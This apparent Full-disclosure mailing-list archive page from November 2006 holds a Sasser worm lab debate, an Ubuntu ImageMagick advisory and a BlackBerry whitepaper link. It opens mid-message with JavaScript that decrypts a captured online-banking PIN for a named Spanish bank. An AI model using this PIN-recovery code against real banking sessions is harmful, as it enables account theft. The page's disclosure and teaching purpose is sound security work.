 We are only interested in PIN=BBCB6E341C56C6B2 and CL=1161006956, CL 
 being the timestamp and PIN being the encrypted form of the PIN 
 number. If we feed these into the following JS code:
 
 https://intelvia.cajamurcia.es/2043/01/scripts/MOD.js
 function hexToString (h) {
   var r = "";
   for (var i = (h.substr(0, 2) == "0x") ? 2 : 0; i < h.length; i += 2) {
     r += String.fromCharCode(parseInt(h.substr(i, 2), 16));
   }
   return r;
 }
 calcula = '1161006956';
 ciphertext = hexToString('0xBBCB6E341C56C6B2');
 var cleartext = des(calcula.substr(2, 8), ciphertext, 0, 1, "");
 console.debug(cleartext);
 
 We will get our original PIN number. This isn't necessarily easier as 
 it requires data capture, which isn't always easy, but screen captures 
 usually require either an OCR, or manual labor, which the above 

Re: [Full-disclosure] Sasser or other nasty worm needed

2006-11-27 Thread Rick
On Mon, 27 Nov 2006, Peter Dawson wrote:

 I doubt schools have CLOSED LAB. I would like to know where the budget comes
 from, for this type of network. If so , then every school district board
 needs one.. :)-

some do. schools partnered with, or using the curriculum of the Center 
for System Security and Information Assurance (www.cssia.org) come to 
mind. i'm sure there are others.

Rick





[Full-disclosure] [USN-386-1] ImageMagick vulnerability

2006-11-27 Thread Kees Cook
=== 
Ubuntu Security Notice USN-386-1  November 28, 2006
imagemagick vulnerability
CVE-2006-5868
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.10:
  libmagick6   6:6.2.3.4-1ubuntu1.5

Ubuntu 6.06 LTS:
  libmagick9   6:6.2.4.5-0.6ubuntu0.4

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Daniel Kobras discovered multiple buffer overflows in ImageMagick's SGI 
file format decoder.  By tricking a user or an automated system into 
processing a specially crafted SGI image, this could be exploited to 
execute arbitrary code with the user's privileges.



Re: [Full-disclosure] Sasser or other nasty worm needed

2006-11-27 Thread Rick
On Mon, 27 Nov 2006, [EMAIL PROTECTED] wrote:

 so when you go to mcdonalds and hand over your $5 for your MCbig meal, do
 you consider the repercussions of supporting an industry which pays low
 wages, is under-staffed, and promotes world-hunger by using enough grain
 to feed a continent, etc...?

 WTF does that have to do with the topic?  Unless you want to make the point
 that often, the McDonald's staff fails to use a level of food-preparation
 hygiene that matches the computer-security hygiene requirements to work with
 known malware?

it seemed to me that you were arguing a reason for not distributing the 
binary was the guy is (not) clued enough to run a 'closed lab' without 
screwing up... making this a 'we shouldn't support this because we 
do not know this person is responsible' approach. so the context of my 
statement relates to consistency of accountability.

 do *you* know where to find a copy?
 Yes.
 did you always?
 Yes.

i'm sorry, but i have a hard time believing this.

 have you always been able to configure a network to talk via EIGRP?
 No, because when I first got on the net, RFC1058 was still 4 years in the
 future. So it wasn't always possible, because the option didn't always
 exist.

and once it did there was a point in time in which you learned. you 
learned because you had access to information. someone else provided this 
information.

 There are a lot of people who are of the opinion that if you have to ask
 where to find a copy of Sasser, you're not clued enough to be trusted with
 a copy.

 perhaps the next time you need a doctor, the one you find will laugh at
 you with the same sense of elitism you demonstrate.

 Did I say I was one of the lot of people? Did you notice that I was
 replying *in the context of KF's comments* saying It's cool because it's
 in a closed lab?

i must've missed that part. i jumped into this because i was once a 
student at university who benefited from this type of 'closed lab learning 
environment.'

you are absolutely correct that something could go wrong, but fear of 
failure ought not keep one from trying. i'm reminded of Roosevelt's 
saying:

It is not the critic who counts: not the man who points out how the 
strong man stumbles or where the doer of deeds could have done better. The 
credit belongs to the man who is actually in the arena, whose face is 
marred by dust and sweat and blood, who strives valiantly, who errs and 
comes up short again and again, because there is no effort without error 
or shortcoming, but who knows the great enthusiasms, the great devotions, 
who spends himself for a worthy cause; who, at the best, knows, in the 
end, the triumph of high achievement, and who, at the worst, if he fails, 
at least he fails while daring greatly, so that his place shall never be 
with those cold and timid souls who knew neither victory nor defeat.



cheers,

Rick



[Full-disclosure] FWD: RE: [Dailydave] Symantec Blackberry Whitepaper. (fwd)

2006-11-27 Thread J.A. Terranson


-- Forwarded message --
Date: Mon, 27 Nov 2006 22:01:16 -0600 (CST)
From: J.A. Terranson [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: RE: [Dailydave] Symantec Blackberry Whitepaper.


Someone was kind enough to send it to me, so I am returning the favor for
those who may still be looking for it:

http://www.mfn.org/~measl/blackberry.security.pdf

Enjoy!

-- 
Yours,

J.A. Terranson
[EMAIL PROTECTED]
0xBD4A95BF

Surely the larger lesson learned from that day is that other men, all
over the world, took inspiration not from the heroism of the rescuers in
New York or the passengers flying over Pennsylvania, but from the 19
hijackers - the twisted brilliance of their scheme and their willingness
to sacrifice their lives to make a political and, as they saw it,
religious statement.

Richard Corliss/Time Magazine
11 Aug 2006



Re: [Full-disclosure] Sasser or other nasty worm needed

2006-11-27 Thread chedder1
Yeah, old computers at schools are often given away for recycling.

On Mon, Nov 27, 2006 at 10:42:14PM -0500, Matthew Flaschen wrote:
 What budget?  Every school that would have a networking class also has
 obsolete computers.  Take a dozen, reformat them, put on an unpatched
 version of Windows, pull out or disable wifi, and connect them all to a
 switch (also probably available second-hand).  Ensure neither computers
 nor switch are connected to any other network.  Sure, you have to be
 sure not to f* it up, but it doesn't cost anything.  Set-up sasser on
 one by moving it off a CD-R.  Wait. :)  This should cost little or nothing.
 
 Matt Flaschen
 
 Peter Dawson wrote:
  I doubt schools have CLOSED LAB. I would like to know where the budget
  comes
  from, for this type of network. If so , then every school district board
  needs one.. :)-
 


-- 
http://chedder.hacked.in
cheesebox.terroristorganization.info
"You don't exist. Go away"
